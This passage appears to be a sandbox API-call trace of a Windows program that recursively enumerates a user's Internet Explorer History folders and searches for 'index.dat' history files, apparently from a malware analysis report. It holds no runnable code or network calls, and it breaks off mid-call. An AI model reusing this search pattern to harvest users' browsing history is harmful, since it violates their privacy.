(_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.928] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.928] wcslen (_String="*.*") returned 0x3 [0066.928] wcscpy (in: _Dest=0x19762c, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History" [0066.928] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.928] wcscat (in: _Dest=0x19762c, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\" [0066.928] wcscat (in: _Dest=0x19762c, _Source="*.*" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\*.*" [0066.928] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\*.*", lpFindFileData=0x1978b4 | out: lpFindFileData=0x1978b4) returned 0x65ed48 [0066.928] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.928] wcslen (_String=".") returned 0x1 [0066.928] wcscpy (in: _Dest=0x197b04, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History" [0066.928] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.928] wcscat (in: _Dest=0x197b04, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\" [0066.928] wcscat (in: _Dest=0x197b04, _Source="." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\.") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\." [0066.928] wcscmp (_String1=".", _String2="..") returned -1 [0066.928] wcscmp (_String1=".", _String2=".") returned 0 [0066.928] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0066.928] FindNextFileW (in: hFindFile=0x65ed48, lpFindFileData=0x1978b4 | out: lpFindFileData=0x1978b4) returned 1 [0066.928] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.928] wcslen (_String="..") returned 0x2 [0066.928] wcscpy (in: _Dest=0x197b04, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History" [0066.929] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.929] wcscat (in: _Dest=0x197b04, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\" [0066.929] wcscat (in: _Dest=0x197b04, _Source=".." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\..") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\.." [0066.929] wcscmp (_String1="..", _String2="..") returned 0 [0066.929] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0066.929] FindNextFileW (in: hFindFile=0x65ed48, lpFindFileData=0x1978b4 | out: lpFindFileData=0x1978b4) returned 1 [0066.929] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.929] wcslen (_String="desktop.ini") returned 0xb [0066.929] wcscpy (in: _Dest=0x197b04, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History" [0066.929] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.929] wcscat (in: _Dest=0x197b04, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\" [0066.929] wcscat (in: _Dest=0x197b04, _Source="desktop.ini" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\desktop.ini" [0066.929] _wcsicmp (_String1="desktop.ini", _String2="index.dat") returned -5 [0066.929] FindNextFileW (in: hFindFile=0x65ed48, lpFindFileData=0x1978b4 | out: lpFindFileData=0x1978b4) returned 1 [0066.929] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.929] wcslen (_String="History.IE5") returned 0xb [0066.929] wcscpy (in: _Dest=0x197b04, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History" [0066.929] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.929] wcscat (in: _Dest=0x197b04, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\" [0066.929] wcscat (in: _Dest=0x197b04, _Source="History.IE5" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0066.929] wcscmp (_String1="History.IE5", _String2="..") returned 1 [0066.929] wcscmp (_String1="History.IE5", _String2=".") returned 1 [0066.929] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x49 [0066.929] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x49 [0066.929] wcslen (_String="*.*") returned 0x3 [0066.929] wcscpy (in: _Dest=0x196c30, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0066.929] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x49 [0066.929] wcscat (in: _Dest=0x196c30, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0066.929] wcscat (in: _Dest=0x196c30, _Source="*.*" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*.*" [0066.929] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\*.*", lpFindFileData=0x196eb8 | out: lpFindFileData=0x196eb8) returned 0x65f1c8 [0066.929] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x49 [0066.929] wcslen (_String=".") returned 0x1 [0066.929] wcscpy (in: _Dest=0x197108, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0066.929] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x49 [0066.929] wcscat (in: _Dest=0x197108, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0066.929] wcscat (in: _Dest=0x197108, _Source="." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\.") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\." [0066.929] wcscmp (_String1=".", _String2="..") returned -1 [0066.929] wcscmp (_String1=".", _String2=".") returned 0 [0066.929] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0066.929] FindNextFileW (in: hFindFile=0x65f1c8, lpFindFileData=0x196eb8 | out: lpFindFileData=0x196eb8) returned 1 [0066.929] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x49 [0066.929] wcslen (_String="..") returned 0x2 [0066.929] wcscpy (in: _Dest=0x197108, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0066.929] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x49 [0066.929] wcscat (in: _Dest=0x197108, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0066.929] wcscat (in: _Dest=0x197108, _Source=".." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\..") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\.." [0066.929] wcscmp (_String1="..", _String2="..") returned 0 [0066.930] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0066.930] FindNextFileW (in: hFindFile=0x65f1c8, lpFindFileData=0x196eb8 | out: lpFindFileData=0x196eb8) returned 1 [0066.930] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x49 [0066.930] wcslen (_String="container.dat") returned 0xd [0066.930] wcscpy (in: _Dest=0x197108, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0066.930] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x49 [0066.930] wcscat (in: _Dest=0x197108, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0066.930] wcscat (in: _Dest=0x197108, _Source="container.dat" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\container.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\container.dat" [0066.930] _wcsicmp (_String1="container.dat", _String2="index.dat") returned -6 [0066.930] FindNextFileW (in: hFindFile=0x65f1c8, lpFindFileData=0x196eb8 | out: lpFindFileData=0x196eb8) returned 1 [0066.930] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x49 [0066.930] wcslen (_String="MSHist012018101620181017") returned 0x18 [0066.930] wcscpy (in: _Dest=0x197108, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0066.930] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x49 [0066.930] wcscat (in: _Dest=0x197108, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0066.930] wcscat (in: _Dest=0x197108, _Source="MSHist012018101620181017" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017" [0066.930] wcscmp (_String1="MSHist012018101620181017", _String2="..") returned 1 [0066.930] wcscmp (_String1="MSHist012018101620181017", _String2=".") returned 1 [0066.930] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned 0x62 [0066.930] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned 0x62 [0066.930] wcslen (_String="*.*") returned 0x3 [0066.930] wcscpy (in: _Dest=0x196234, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017" [0066.930] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned 0x62 [0066.930] wcscat (in: _Dest=0x196234, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\" [0066.930] wcscat (in: _Dest=0x196234, _Source="*.*" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\*.*" [0066.930] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\*.*", lpFindFileData=0x1964bc | out: lpFindFileData=0x1964bc) returned 0x65eec8 [0066.930] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned 0x62 [0066.930] wcslen (_String=".") returned 0x1 [0066.930] wcscpy (in: _Dest=0x19670c, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017" [0066.930] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned 0x62 [0066.930] wcscat (in: _Dest=0x19670c, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\" [0066.930] wcscat (in: _Dest=0x19670c, _Source="." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\.") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\." [0066.930] wcscmp (_String1=".", _String2="..") returned -1 [0066.930] wcscmp (_String1=".", _String2=".") returned 0 [0066.930] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0066.930] FindNextFileW (in: hFindFile=0x65eec8, lpFindFileData=0x1964bc | out: lpFindFileData=0x1964bc) returned 1 [0066.931] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned 0x62 [0066.931] wcslen (_String="..") returned 0x2 [0066.931] wcscpy (in: _Dest=0x19670c, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017" [0066.931] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned 0x62 [0066.931] wcscat (in: _Dest=0x19670c, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\" [0066.931] wcscat (in: _Dest=0x19670c, _Source=".." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\..") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\.." [0066.931] wcscmp (_String1="..", _String2="..") returned 0 [0066.931] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0066.931] FindNextFileW (in: hFindFile=0x65eec8, lpFindFileData=0x1964bc | out: lpFindFileData=0x1964bc) returned 1 [0066.931] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned 0x62 [0066.931] wcslen (_String="container.dat") returned 0xd [0066.931] wcscpy (in: _Dest=0x19670c, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017" [0066.931] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017") returned 0x62 [0066.931] wcscat (in: _Dest=0x19670c, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\" [0066.931] wcscat (in: _Dest=0x19670c, _Source="container.dat" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\container.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018101620181017\\container.dat" [0066.931] _wcsicmp (_String1="container.dat", _String2="index.dat") returned -6 [0066.931] FindNextFileW (in: hFindFile=0x65eec8, lpFindFileData=0x1964bc | out: lpFindFileData=0x1964bc) returned 0 [0066.931] FindClose (in: hFindFile=0x65eec8 | out: hFindFile=0x65eec8) returned 1 [0066.931] FindNextFileW (in: hFindFile=0x65f1c8, lpFindFileData=0x196eb8 | out: lpFindFileData=0x196eb8) returned 0 [0066.931] FindClose (in: hFindFile=0x65f1c8 | out: hFindFile=0x65f1c8) returned 1 [0066.931] FindNextFileW (in: hFindFile=0x65ed48, lpFindFileData=0x1978b4 | out: lpFindFileData=0x1978b4) returned 1 [0066.931] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.931] wcslen (_String="Low") returned 0x3 [0066.931] wcscpy (in: _Dest=0x197b04, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History" [0066.931] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x3d [0066.931] wcscat (in: _Dest=0x197b04, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\" [0066.931] wcscat (in: _Dest=0x197b04, _Source="Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low" [0066.931] wcscmp (_String1="Low", _String2="..") returned 1 [0066.931] wcscmp (_String1="Low", _String2=".") returned 1 [0066.931] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x41 [0066.931] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x41 [0066.931] wcslen (_String="*.*") returned 0x3 [0066.931] wcscpy (in: _Dest=0x196c30, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low" [0066.931] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x41 [0066.931] wcscat (in: _Dest=0x196c30, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\" [0066.931] wcscat (in: _Dest=0x196c30, _Source="*.*" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\*.*" [0066.931] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\*.*", lpFindFileData=0x196eb8 | out: lpFindFileData=0x196eb8) returned 0x65ef88 [0066.931] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x41 [0066.932] wcslen (_String=".") returned 0x1 [0066.932] wcscpy (in: _Dest=0x197108, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low" [0066.932] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x41 [0066.932] wcscat (in: _Dest=0x197108, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\" [0066.932] wcscat (in: _Dest=0x197108, _Source="." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\.") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\." [0066.932] wcscmp (_String1=".", _String2="..") returned -1 [0066.932] wcscmp (_String1=".", _String2=".") returned 0 [0066.932] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0066.932] FindNextFileW (in: hFindFile=0x65ef88, lpFindFileData=0x196eb8 | out: lpFindFileData=0x196eb8) returned 1 [0066.932] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x41 [0066.932] wcslen (_String="..") returned 0x2 [0066.932] wcscpy (in: _Dest=0x197108, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low" [0066.932] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x41 [0066.932] wcscat (in: _Dest=0x197108, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\" [0066.932] wcscat (in: _Dest=0x197108, _Source=".." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\..") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\.." [0066.932] wcscmp (_String1="..", _String2="..") returned 0 [0066.932] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0066.932] FindNextFileW (in: hFindFile=0x65ef88, lpFindFileData=0x196eb8 | out: lpFindFileData=0x196eb8) returned 1 [0066.932] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x41 [0066.932] wcslen 